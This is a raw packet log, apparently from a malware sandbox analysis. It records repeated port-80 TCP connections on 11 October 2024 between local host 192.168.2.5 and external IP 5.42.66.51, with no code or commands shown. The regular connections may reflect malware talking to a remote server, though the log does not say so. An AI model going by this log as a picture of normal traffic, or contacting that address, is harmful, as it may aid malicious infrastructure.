                                                                                                Oct 11, 2024 20:38:31.583117962 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.583133936 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.583147049 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.776782990 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.826205015 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.903361082 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.941895962 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.950301886 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.044914007 CEST5002780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.059052944 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.221462011 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.221508026 CEST5002780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.222779036 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.226825953 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.227341890 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.227413893 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.227436066 CEST5002780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.227751970 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.227823973 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.240073919 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.245083094 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.592092991 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.597215891 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.597230911 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.597284079 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.915463924 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.920795918 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.921442986 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.921540976 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:32.926634073 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:32.951159954 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.044955015 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.083218098 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.224158049 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.225050926 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.229809999 CEST80500285.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.230118990 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.230233908 CEST5002880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.230261087 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.230432034 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.235598087 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.279489994 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.284502029 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.284617901 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.577200890 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.582302094 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.582315922 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.582448006 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.617772102 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.716835022 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.755724907 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:33.826208115 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:33.935823917 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.044930935 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.078910112 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.246390104 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.246447086 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.246696949 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.251667023 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.251749992 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.251848936 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.252283096 CEST80500295.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.252295017 CEST80500305.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.252329111 CEST5002980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.252361059 CEST5003080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.256999016 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.607618093 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.612580061 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.612612009 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.612622023 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.764436960 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.769536018 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.769629955 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.769776106 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:34.774611950 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.949815989 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:34.998059034 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.080893993 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.123087883 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.123198986 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.128156900 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.128401041 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.212831974 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.213100910 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.218060017 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.218148947 CEST80500315.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.218166113 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.218205929 CEST5003180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.219871998 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.224687099 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.466171026 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.544919968 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.576314926 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.581222057 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.581513882 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.581526995 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.598938942 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.748049021 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:35.898169994 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:35.951235056 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.027194977 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.076180935 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.253791094 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.253942013 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.254167080 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.259187937 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.259413004 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.259474039 CEST80500325.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.259499073 CEST80500335.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.259537935 CEST5003280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.259574890 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.259574890 CEST5003380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.264753103 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.623825073 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.628926992 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.628940105 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.629213095 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.639323950 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.644581079 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.644690037 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.645514011 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:36.650393963 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:36.963489056 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.000258923 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.006336927 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.006583929 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.044914961 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.095158100 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.248037100 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.349616051 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.398099899 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.422802925 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.423119068 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.428370953 CEST80500345.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.428448915 CEST5003480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.429775953 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.429852009 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.430051088 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.434984922 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.487339973 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.529297113 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.779566050 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:37.785079956 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.785094976 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:37.785125971 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.114505053 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.169975042 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.243510008 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.294986963 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.501646996 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.501646042 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.502443075 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.507280111 CEST80500355.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.507406950 CEST5003580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.507606983 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.507688999 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.507783890 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.508656025 CEST80500365.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.508713007 CEST5003680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.513282061 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.809981108 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.815443039 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.815551043 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.815675020 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.820548058 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.857650995 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.862605095 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.863105059 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.170012951 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:39.290798903 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.293463945 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.293479919 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.293529987 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.319175005 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.319422007 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:39.504086018 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.591775894 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:39.633981943 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.695575953 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.327095985 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.328569889 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.328666925 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.333478928 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.333535910 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.333741903 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.333991051 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.334319115 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.334361076 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.337326050 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.342411995 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.685940981 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.691147089 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.691266060 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:41.019238949 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:41.147634983 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:41.147692919 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.073805094 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.078761101 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.078843117 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.079010963 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.085242033 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.155556917 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.161976099 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.162110090 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.162494898 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.168973923 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.439129114 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.445683956 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.445777893 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.445790052 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.551562071 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.557784081 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.557857990 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.761137009 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.847465992 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.888695955 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.891403913 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.893649101 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.899028063 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.899089098 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:43.091886044 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.480247021 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.480545998 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.485877037 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.485945940 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.486063957 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.486644030 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.486768007 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.491393089 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.842129946 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.847183943 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.847208977 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:45.172259092 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:45.222601891 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:45.279352903 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:45.302998066 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:45.388674021 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.318476915 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.318542004 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.323760986 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.323872089 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.323996067 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.324165106 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.324220896 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.329155922 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.707222939 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.712409973 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.712428093 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.185225964 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.190274000 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.190351009 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.190479994 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.195966959 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.288727999 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.340470076 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.545495987 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.550465107 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.550487995 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.550513029 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.053354979 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.191018105 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.193804026 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.387075901 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.387667894 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.392628908 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.392712116 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.392735958 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.392870903 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.470120907 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.475042105 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.889848948 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.894821882 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.894921064 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.095366955 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.227150917 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.227390051 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:49.812345028 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.812468052 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.326150894 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.326395988 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.331438065 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:50.331527948 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.331645966 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.331919909 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:50.331988096 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.336900949 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:50.685612917 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.691025019 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:50.691039085 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:51.032080889 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:51.138683081 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:51.161204100 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:51.248040915 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.222143888 CEST5004780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.222142935 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.227359056 CEST80500475.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.227608919 CEST5004780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.227608919 CEST5004780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.227621078 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.227668047 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.232486963 CEST80500475.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.576322079 CEST5004780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.581464052 CEST80500475.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.581624031 CEST80500475.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.785654068 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.790678024 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.790738106 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.790832043 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.795629978 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.833674908 CEST5004780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:52.839216948 CEST80500475.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:52.839276075 CEST5004780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:53.138720036 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:53.144115925 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:53.144133091 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:53.144140959 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:53.487677097 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:53.544914007 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:53.999788046 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:53.999907970 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:53.999958038 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.000293970 CEST80500485.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:54.000332117 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.013331890 CEST5004880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.015260935 CEST5004980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:54.018445015 CEST80500485.42.66.51192.168.2.5
